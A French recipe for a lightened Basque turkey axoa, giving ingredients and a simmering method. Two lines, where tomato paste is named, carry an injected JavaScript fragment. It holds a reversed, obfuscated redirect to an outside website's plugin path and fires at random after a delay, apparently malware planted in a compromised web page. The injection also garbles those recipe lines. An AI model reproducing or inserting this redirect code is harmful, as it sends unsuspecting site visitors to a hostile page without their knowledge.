
AXOA DE DINDE (la recette basque en version allégée) :
Pour 4 Pers.
INGRÉDIENTS :
– 600g d’escalopes de dinde coupées en petits cubes
– 2 poivrons rouges épépinés et coupés en petits dés
– Concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate 2 CS
– Oignons émincés (2)
– Gousses d’ail émincées (2)
– 300 ml de bouillon de volaille
– Origan 1 CS
– Thym 1 CS
– Piment d’Espelette (1cc si vous n’aimez pas les plats trop épicés) 2 CC
– Huile d’olive 1CS
– Fleur de sel et poivre du moulin
Faire revenir dans une cocotte les poivrons et les oignons à feu vif dans l’huile d’olive 1 minute.
Ajouter la viande, l’ail, les herbes et le piment.
Faire revenir 3 minutes en remuant.
Verser le bouillon dans la cocotte avec le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate.
Saler, poivrer et porter à ébullition.
Baisser le feu et laisser mijoter à couvert pendant 30 minutes.
A la fin, retirer le couvercle pour laisser la sauce s’épaissir un peu.
Bon appétit !
